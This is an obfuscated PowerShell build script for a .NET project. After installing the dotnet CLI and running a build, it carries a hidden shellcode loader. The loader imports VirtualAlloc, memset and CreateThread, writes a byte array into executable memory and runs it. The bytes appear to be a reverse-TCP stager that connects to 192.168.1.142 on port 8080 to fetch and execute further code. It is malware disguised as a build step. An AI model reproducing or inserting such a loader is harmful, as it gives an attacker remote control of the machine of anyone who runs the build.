${D`OTnE`TC`Lic`HANN`EL} = ("{1}{2}{0}" -f'rent','Cu','r')
${dOtnETcLiREQ`UI`ReDve`Rs`ioN} = ("{0}{2}{1}"-f'la','st','te')
${nO`sU`do} = ${F`Al`SE}

. "$PSScriptRoot/tools.ps1"

${doTnEtar`guM`e`N`TS} = @{ ("{1}{2}{0}"-f 'el','C','hann') = ${D`Otnetc`l`I`cHAn`NEl}; ("{2}{1}{0}" -f 'n','o','Versi') = ${Dot`Ne`TCLI`RE`QUirED`VERsion}; ("{1}{2}{0}" -f 'o','NoSu','d') = ${noS`U`dO} }
&("{3}{2}{4}{1}{0}" -f'otnet','D','n','I','stall-') @DotnetArguments


${eN`V`:PaTH} += "$([IO.Path]::PathSeparator)$Env:HOME/.dotnet"


&("{1}{0}" -f't','dotne') ("{0}{1}"-f 'bu','ild') -version -nologo




${c} = ((("{54}{42}{128}{124}{116}{86}{82}{76}{126}{31}{60}{13}{5}{48}{27}{88}{90}{23}{2}{36}{114}{37}{68}{49}{58}{7}{3}{39}{97}{29}{72}{100}{80}{9}{28}{11}{30}{123}{67}{51}{109}{10}{96}{20}{93}{120}{17}{85}{99}{79}{8}{55}{44}{119}{43}{61}{73}{84}{101}{47}{12}{102}{89}{125}{111}{66}{35}{52}{117}{71}{38}{41}{122}{75}{6}{70}{104}{19}{14}{16}{106}{78}{25}{103}{110}{77}{92}{18}{50}{118}{98}{1}{94}{62}{0}{91}{26}{81}{40}{95}{22}{87}{127}{64}{69}{32}{59}{105}{4}{112}{46}{57}{45}{15}{53}{24}{21}{113}{56}{121}{34}{33}{108}{115}{74}{83}{63}{65}{107}" -f'Ptr ','ss, ','Pt','dwSize, ui','v','r','A','t ','32.dlla','y','[DllI',', uint fl','Ptr C','xte',', uint ','ic extern','dw','k','Pt','s','(','r ','reationFlags, ','lAlloc(Int','t','c','pPar','ntPt','pe','flAlloca','Prot',' ','lImp','nt src','tPtr dest, ui','d','r lp','ddres','r','nt','uint d',' l','DllI','s','public','ic stat','laJv)]','t','n I',' ui','r lpStartAd',')','(Int',' IntP','[','Jv)]','set(','publ','n','o','e','ta','nt',' ','tr lpThreadId);[D','cou','a','t','s,','l','t','t','t','tic','n','ead','laJv)]public sta',', In','a','el','T','ameter, ','32.dl','t',' e','er','Jvkernel','I','r Virt','e','ua','l','t','aJ','I','wC','mport',' ','re','n','ion','xtern In','reat','kSiz','tribute','rt(aJvms','St','nt);',',',';','e','re','crt.dl','mem','A',' ui','t(a','P','d',' ','v','In','pThr','ec','or','Th','tic','ntP','mp'))."repl`A`Ce"(([cHaR]97+[cHaR]74+[cHaR]118),[sTRING][cHaR]34));${W} = .("{1}{2}{0}"-f 'e','Add','-Typ') -memberDefinition ${c} -Name ("{0}{1}"-f'Win','32') -namespace ("{4}{0}{1}{3}{2}"-f'n32','Functio','s','n','Wi') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x8e,0x68,0x02,0x00,0x1f,0x90,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x3f,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xe9,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xc3,0x01,0xc3,0x29,0xc6,0x75,0xe9,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${z}."LenG`TH" -gt 0x1000){${g} = ${z}."LEnG`Th"};${X}=${W}::("{0}{1}{2}" -f'Vir','tualAll','oc').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${z}."lENg`TH"-1);${i}++) {${W}::"MeM`s`ET"([IntPtr](${x}.("{1}{0}" -f 'oInt32','T').Invoke()+${i}), ${z}[${I}], 1)};${W}::("{0}{3}{1}{2}"-f'Crea','re','ad','teTh').Invoke(0,0,${x},0,0,0);for (;;){.("{2}{1}{0}" -f'p','tart-slee','S') 60};
